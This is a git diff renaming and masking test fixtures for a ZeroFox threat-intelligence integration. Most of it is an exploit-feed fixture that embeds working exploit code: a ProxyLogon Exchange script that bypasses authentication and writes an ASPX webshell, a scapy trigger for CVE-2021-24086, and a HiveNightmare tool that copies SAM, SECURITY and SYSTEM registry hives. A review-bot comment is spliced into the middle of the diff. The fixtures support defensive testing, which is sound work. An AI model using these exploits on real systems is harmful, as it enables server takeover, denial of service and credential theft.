headers['Cookie'] = ';'.join(cookies)\n headers['msExchLogonMailbox'] = 'S-1-5-20'\n\n url = f\"https://{HOST}/ecp/y.js\"\n resp = requests.post(url, headers=headers, data=data, verify=False, allow_redirects=False)\n return resp\n\ndef parse_challenge(auth):\n target_info_field = auth[40:48]\n target_info_len = _unpack_int('H', target_info_field[0:2])\n target_info_offset = _unpack_int('I', target_info_field[4:8])\n\n target_info_bytes = 
auth[target_info_offset:target_info_offset+target_info_len]\n\n domain_name = ''\n computer_name = ''\n info_offset = 0\n while info_offset < len(target_info_bytes):\n av_id = _unpack_int('H', target_info_bytes[info_offset:info_offset+2])\n av_len = _unpack_int('H', target_info_bytes[info_offset+2:info_offset+4])\n av_value = target_info_bytes[info_offset+4:info_offset+4+av_len]\n\n info_offset = info_offset + 4 + av_len\n if av_id == 2: # MsvAvDnsDomainName\n domain_name = _unpack_str(av_value)\n elif av_id == 3: # MsvAvDnsComputerName\n computer_name = _unpack_str(av_value)\n return domain_name, computer_name\n\ndef get_local_name():\n global LOCAL_NAME\n Log.info(\"Getting ComputerName and DomainName.\")\n ntlm_type1 = (\n b'NTLMSSP\\x00' # NTLMSSp Signature\n b'\\x01\\x00\\x00\\x00' # Message Type\n b'\\x97\\x82\\x08\\xe2' # Flags\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' # Domain String\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' # Workstation String\n b'\\x0a\\x00\\xba\\x47\\x00\\x00\\x00\\x0f' # OS Version\n )\n headers = {\n 'Authorization': f'Negotiate {b64encode(ntlm_type1).decode()}'\n }\n # print(headers)\n # assert False\n r = requests.get(f'https://{HOST}/rpc/', headers=headers, verify=False)\n assert r.status_code == 401, \"Error while getting ComputerName\"\n auth_header = r.headers['WWW-Authenticate']\n auth = re.search('Negotiate ([A-Za-z0-9/+=]+)', auth_header).group(1)\n domain_name, computer_name = parse_challenge(b64decode(auth))\n if not domain_name:\n Log.waring(\"DomainName not found.\")\n return exit(0)\n if not computer_name:\n Log.waring(\"ComputerName not found\")\n return exit(0)\n Log.info(f\"Domain Name = {domain_name}\")\n Log.info(f\"Computer Name = {computer_name}\")\n LOCAL_NAME = computer_name\n\n\ndef get_sid(mail):\n payload = f'''\n\n \n {mail}\n http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\n \n\n'''\n headers = {\n 'User-Agent': 'ExchangeServicesClient/0.0.0.0', \n 'Content-Type': 
'text/xml'\n }\n resp = exploit('/autodiscover/autodiscover.xml', qs='', data=payload, headers=headers)\n res = re.search('(.*?)', resp.text)\n if not res:\n Log.waring(\"LegacyDN not found!\")\n return\n\n headers = {\n 'X-Clientapplication': 'Outlook/15.0.4815.1002', \n 'X-Requestid': 'x', \n 'X-Requesttype': 'Connect', \n 'Content-Type': 'application/mapi-http', \n }\n legacyDN = res.group(1)\n payload = legacyDN + '\\x00\\x00\\x00\\x00\\x00\\x20\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00'\n r = exploit('/mapi/emsmdb/', qs='', data=payload, headers=headers)\n result = re.search('with SID ([S\\-0-9]+) ', r.text)\n if not result:\n Log.waring(f\"Not Found user: {mail}\")\n return None\n sid = result.group(1)\n Log.info(f\"sid:{sid}\")\n if \"500\" not in sid.split(\"-\"):\n Log.waring(\"500 not in sid.\")\n sid = \"-\".join(sid.split(\"-\")[:-1]+[\"500\"])\n Log.info(f\"add -500, sid:{sid}\")\n return sid\n\n \n\n\ndef exp(mail_name, sid):\n payload = f'{sid}'\n resp = exploit('/ecp/proxyLogon.ecp', qs='', data=payload)\n Log.waring(f\"Login status code:{resp.status_code}\")\n\n session_id = resp.cookies.get('ASP.NET_SessionId')\n canary = resp.cookies.get('msExchEcpCanary')\n Log.info(f'get ASP.NET_SessionId = {session_id}')\n Log.info(f\"get msExchEcpCanary = {canary}\")\n \n extra_cookies = [\n 'ASP.NET_SessionId='+session_id, \n 'msExchEcpCanary='+canary\n ]\n qs = urlencode({\n 'schema': 'OABVirtualDirectory', \n 'msExchEcpCanary': canary\n })\n r = exploit('/ecp/DDI/DDIService.svc/GetObject', qs=qs, data='', cookies=extra_cookies)\n identity = r.json()['d']['Output'][0]['Identity']\n Log.info(f\"OAB Name = f{identity['DisplayName']}\")\n Log.info(f\"OAB ID = {identity['RawIdentity']}\")\n\n # Set-OABVirtualDirectory\n Log.info(\"Setting up webshell payload through OAB\")\n qs = urlencode({\n 'schema': 'OABVirtualDirectory', \n 'msExchEcpCanary': canary\n })\n payload = json.dumps({\n 'identity': {\n '__type': 'Identity:ECP', 
\n 'DisplayName': identity['DisplayName'], \n 'RawIdentity': identity['RawIdentity']\n }, \n 'properties': {\n 'Parameters': {\n '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', \n 'ExternalUrl': 'some_host/' + FILE_DATA\n }\n }\n })\n r = exploit('/ecp/DDI/DDIService.svc/SetObject', qs=qs, data=payload, cookies=extra_cookies)\n assert r.status_code == 200, 'Error while setting up webshell payload'\n Log.success(\"Setting up webshell payload OK!\")\n\n # save file\n Log.info(\"Writing shell...\")\n qs = urlencode({\n 'schema': 'ResetOABVirtualDirectory', \n 'msExchEcpCanary': canary\n })\n payload = json.dumps({\n 'identity': {\n '__type': 'Identity:ECP', \n 'DisplayName': identity['DisplayName'], \n 'RawIdentity': identity['RawIdentity']\n }, \n 'properties': {\n 'Parameters': {\n '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', \n 'FilePathName': FILE_PATH\n }\n }\n })\n resp = exploit('/ecp/DDI/DDIService.svc/SetObject', qs=qs, data=payload, cookies=extra_cookies)\n if resp.status_code != 200:\n Log.waring(f\"Error while writing shell, status code is {resp.status_code}\")\n return\n\n\n Log.info(\"Cleaning OAB...\")\n qs = urlencode({\n 'schema': 'OABVirtualDirectory', \n 'msExchEcpCanary': canary\n })\n payload = json.dumps({\n 'identity': {\n '__type': 'Identity:ECP', \n 'DisplayName': identity['DisplayName'], \n 'RawIdentity': identity['RawIdentity']\n }, \n 'properties': {\n 'Parameters': {\n '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', \n 'ExternalUrl': ''\n }\n }\n })\n resp = exploit('/ecp/DDI/DDIService.svc/SetObject', qs=qs, data=payload, cookies=extra_cookies)\n Log.info(f\"resp:{resp.status_code}\")\n Log.success(f\"shell: https://{HOST}/aspnet_client/{SHELL_NAME}.aspx\")\n\n\n\ndef run(runner):\n global HOST, MAILS\n f = open(MAILS)\n try:\n while True:\n mail = next(f)[:-1]\n return runner(mail)\n except:\n Log.waring(\"mails file has been 
read.\")\n\ndef runner(mail):\n get_local_name()\n sid = get_sid(mail)\n if not sid:\n return\n return exp(mail.split('@')[0], sid)\n\ndef main():\n global HOST, MAILS, MAIL, ARGS\n args = {}\n for v in ARGS:\n args.update(v)\n\n HOST = args.get(\"--host\")\n if not HOST:\n return help()\n \n MAIL=args.get(\"--mail\")\n if MAIL:\n return runner(MAIL)\n\n MAILS=args.get(\"--mails\")\n if MAILS:\n return run(runner)\n\ndef help():\n cout << f\"\"\"usage:\n python {__file__} --host=exchange.com --mail=admin@exchange.com\n python {__file__} --host=exchange.com --mails=./mails.txt\nargs:\n --host: target's address.\n --mail: exists user's mail.\n --mails: mails file.\n \"\"\"\n cout << endl\n\ndef Logo():\n return ''' \n=============================================================\n \n ___ _ \n| . \\ _ _ ___ __ _ _ | | ___ ___ ___ ._ _ \n| _/| '_>/ . \\\\ \/| | || |_ / . \/ . |/ . \\| ' |\n|_| |_| \\___//\\_\\`_. ||___|\\___/\\_. |\\___/|_|_|\n <___' <___' \n\n author: p0wershe11,RGDZ\n=============================================================\n'''\n\n\nif __name__ == \"__main__\":\n cout << Logo()\n main()" + }, + { + "created_at": "2021-07-26T17:22:12Z", + "cve": "CVE-2021-24086", + "urls": [ + "https://github.com/0vercl0k/CVE-2021-24086" + ], + "exploit": "# Axel '0vercl0k' Souchet - April 7 2021\nfrom scapy.all import *\nimport argparse\n\ndef frag6(target, frag_id, bytes, nh, frag_size = 1008):\n '''Ghetto fragmentation.'''\n assert (frag_size % 8) == 0\n leftover = bytes\n offset = 0\n frags = []\n while len(leftover) > 0:\n chunk = leftover[: frag_size]\n leftover = leftover[len(chunk): ]\n last_pkt = len(leftover) == 0\n # 0 -> No more / 1 -> More\n m = 0 if last_pkt else 1\n assert offset < 8191\n pkt = Ether() \\\n / IPv6(dst = target) \\\n / IPv6ExtHdrFragment(m = m, nh = nh, id = frag_id, offset = offset) \\\n / chunk\n\n offset += (len(chunk) // 8)\n frags.append(pkt)\n return frags\n\ndef pull_the_trigger(args):\n '''Trigger CVE-2021-24086 patched in 
REL2102.'''\n frag_id = random.randint(0, 0xffffffff)\n second_pkt_id = (~frag_id & 0xffffffff)\n reassembled_pkt = IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n 
PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n 
PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n 
PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n 
PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xa0)),\n ]) \\\n / IPv6ExtHdrFragment(\n id = second_pkt_id, m = 1,\n nh = 17, offset = 0\n ) \\\n / UDP(dport = 31337, sport = 31337, chksum=0x7e7f)\n\n reassembled_pkt = bytes(reassembled_pkt)\n assert (len(reassembled_pkt) % 8) == 0, 'not aligned'\n frags = frag6(args.target, frag_id, reassembled_pkt, 60)\n\n print(f'{len(frags)} fragments, total size {hex(len(reassembled_pkt))}')\n sendp(frags, iface= args.iface)\n\n reassembled_pkt_2 = Ether() \\\n / IPv6(dst = args.target) \\\n / IPv6ExtHdrFragment(id = second_pkt_id, m = 0, offset = 1, nh = 17) \\\n / 'doar-e ftw'\n\n sendp(reassembled_pkt_2, iface = args.iface)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--target', default = 'some_ipv6')\n parser.add_argument('--iface', default = 'eth1')\n args = parser.parse_args()\n pull_the_trigger(args)\n return\n\nif __name__ == '__main__':\n main()" + }, + { + "created_at": "2021-07-26T17:24:06Z", + "cve": "CVE-2021-36934", + "urls": [ + "https://github.com/FireFart/hivenightmare", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934" + ], + "exploit": "package main\n\nimport 
(\n\t\"fmt\"\n\t\"io/ioutil\"\n\t\"os\"\n\t\"time\"\n)\n\nconst (\n\tbase = `\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy`\n\ttimeFormat = \"2006-01-02T15_04_05Z07_00\"\n)\n\nfunc processFile(path string) ([]byte, time.Time, error) {\n\tf, err := os.Open(path)\n\tif err != nil {\n\t\treturn nil, time.Now(), fmt.Errorf(\"error opening file: %+v\", err)\n\t}\n\tdefer f.Close()\n\tinfo, err := f.Stat()\n\tif err != nil {\n\t\treturn nil, time.Now(), fmt.Errorf(\"error getting file info: %+v\", err)\n\t}\n\tcontent, err := ioutil.ReadFile(path)\n\tif err != nil {\n\t\treturn nil, time.Now(), fmt.Errorf(\"error reading file content: %+v\", err)\n\t}\n\treturn content, info.ModTime(), nil\n}\n\nfunc checkFile(friendlyname, path string) ([]byte, time.Time, error) {\n\tvar lastmodify time.Time\n\tvar content []byte\n\tfor i := 1; i <= 20; i++ {\n\t\tfullPath := fmt.Sprintf(`%s%d\\%s`, base, i, path)\n\t\tfileContent, fileMod, err := processFile(fullPath)\n\t\tif err != nil {\n\t\t\t// fmt.Println(err)\n\t\t\tcontinue\n\t\t}\n\t\tif fileMod.After(lastmodify) {\n\t\t\tlastmodify = fileMod\n\t\t\tcontent = fileContent\n\t\t}\n\t}\n\tif content == nil || len(content) == 0 {\n\t\treturn nil, time.Now(), fmt.Errorf(\"could not detect a copy of %s in a shadow copy. 
Maybe the system is already patched or there are no shaow copies\", friendlyname)\n\t}\n\treturn content, lastmodify, nil\n}\n\nfunc main() {\n\tcontent, lastMod, err := checkFile(\"SAM\", `Windows\\System32\\config\\SAM`)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t} else {\n\t\tfilename := fmt.Sprintf(\"hive_sam_%s\", lastMod.Format(timeFormat))\n\t\tif err := ioutil.WriteFile(filename, content, 0644); err != nil {\n\t\t\tfmt.Printf(\"could not write %s: %v\\n\", filename, err)\n\t\t}\n\t\tfmt.Printf(\"Saved a copy of SAM to %s with last modify date of %s\\n\", filename, lastMod)\n\t}\n\n\tcontent, lastMod, err = checkFile(\"SECURITY\", `Windows\\System32\\config\\SECURITY`)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t} else {\n\t\tfilename := fmt.Sprintf(\"hive_security_%s\", lastMod.Format(timeFormat))\n\t\tif err := ioutil.WriteFile(filename, content, 0644); err != nil {\n\t\t\tfmt.Printf(\"could not write %s: %v\\n\", filename, err)\n\t\t}\n\t\tfmt.Printf(\"Saved a copy of SECURITY to %s with last modify date of %s\\n\", filename, lastMod)\n\t}\n\n\tcontent, lastMod, err = checkFile(\"SYSTEM\", `Windows\\System32\\config\\SYSTEM`)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t} else {\n\t\tfilename := fmt.Sprintf(\"hive_system_%s\", lastMod.Format(timeFormat))\n\t\tif err := ioutil.WriteFile(filename, content, 0644); err != nil {\n\t\t\tfmt.Printf(\"could not write %s: %v\\n\", filename, err)\n\t\t}\n\t\tfmt.Printf(\"Saved a copy of SYSTEM to %s with last modify date of %s\\n\", filename, lastMod)\n\t}\n}" + } + ] +} diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/malware.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/malware.json similarity index 86% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/malware.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/malware.json index f7bb3a08a8bf..96caef96d871 100644 --- a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/malware.json 
+++ b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/malware.json
@@ -6,7 +6,7 @@
 "family": null,
 "md5": "e89b43d57a67a3f4d705028cfbd7b6fb",
 "sha1": "332c39d5130752b8c32d3b7275a05c13e874db84",
- "sha256": "4bc6320085fff7355dd7916a03ef469af0baea9b0a613a1582bdd2a457c6fa40",
+ "sha256": "****",
 "sha512": "809e3b6e2eb34a7a061bb8de610baef25f91c0dee5fe1d2e42d04a0ac42e43b40b1ee4e42352cc7d59322aa5cf4b2645c85fed7f36906d68e22e400d48e437ef",
 "tags": [
 "evasion",
diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/phishing.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/phishing.json
similarity index 90%
rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/phishing.json
rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/phishing.json
index 868c9d752a1a..00f8fa77f1df 100644
--- a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/phishing.json
+++ b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/phishing.json
@@ -11,7 +11,7 @@
 "issued": "1970-01-19T15:18:43.200000Z"
 },
 "host": {
- "ip": "104.26.0.107",
+ "ip": "some_ip_address",
 "asn": 13335,
 "geo": "US"
 }
@@ -19,14 +19,14 @@
 {
 "scanned": "2021-07-12T12:41:38Z",
 "domain": "hutsjwt.com",
- "url": "https://hutsjwt.com/css/mbt",
+ "url": "some_url/css/mbt",
 "cert": {
 "authority": "cPanel, Inc.",
 "fingerprint": "871B3BD9A98E83573B8368DFDB09629D4E1777BB",
 "issued": "2021-05-09T00:00:00Z"
 },
 "host": {
- "ip": "164.138.221.136",
+ "ip": "some_ip_address",
 "asn": 201200,
 "geo": "BG"
 }
@@ -41,7 +41,7 @@
 "issued": "2021-06-23T23:25:26Z"
 },
 "host": {
- "ip": "176.236.107.10",
+ "ip": "some_ip_address",
 "asn": 34984,
 "geo": "TR"
 }
diff --git a/Packs/ZeroFox/Integrations/ZeroFox/test_data/entities/create_entity.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/entities/create_entity.json
new file mode 100644
index 000000000000..aca6770b3b20
--- /dev/null
+++ b/Packs/ZeroFox/Integrations/ZeroFox/test_data/entities/create_entity.json
@@ -0,0 +1,3 @@
+{
+ "id": "1"
+}
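Review bot: The masked value `"sha256": "****"` in the malware.json hunk is not sha256-shaped, so anything that checks hash length or derives an indicator type from that field would presumably reject this fixture; if the goal is only to avoid shipping a real hash, a constructed 64-hex value such as `"sha256": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"` keeps the record realistic. The md5, sha1 and sha512 on the adjacent context lines are left untouched, so the sample is still fully identifiable — either mask all four or none. The same format problem applies to the three phishing.json hunks on this line, where `"ip": "some_ip_address"` and `"url": "some_url/css/mbt"` are not parseable as an address or a URL while the `"domain": "hutsjwt.com"` context line is still unmasked, and to the four entities_8_records.json hunks on the next line, where `"email_address": "some_email_address"` is not a valid address. Reserved documentation values — an RFC 5737 address such as `192.0.2.1`, and RFC 2606 names such as `james@example.com` or `https://example.com/css/mbt` — exist for exactly this purpose and keep the fixtures syntactically valid.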
diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/entities/entities_8_records.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/entities/entities_8_records.json
similarity index 98%
rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/entities/entities_8_records.json
rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/entities/entities_8_records.json
index 4a127a1678ad..3833e0b8a430 100644
--- a/Packs/ZeroFox/Integrations/ZeroFox/TestData/entities/entities_8_records.json
+++ b/Packs/ZeroFox/Integrations/ZeroFox/test_data/entities/entities_8_records.json
@@ -93,7 +93,7 @@
 {
 "id": 560631,
 "name": "James Rhodes",
- "email_address": "james@stark.com",
+ "email_address": "some_email_address",
 "image": "https://cdn.zerofox.com/media/entityimages/d6b7aaa4-a11.jpg",
 "organization": "",
 "labels": [
@@ -136,7 +136,7 @@
 {
 "id": 560633,
 "name": "Natasha Romanoff",
- "email_address": "natasha@stark.com",
+ "email_address": "some_email_address",
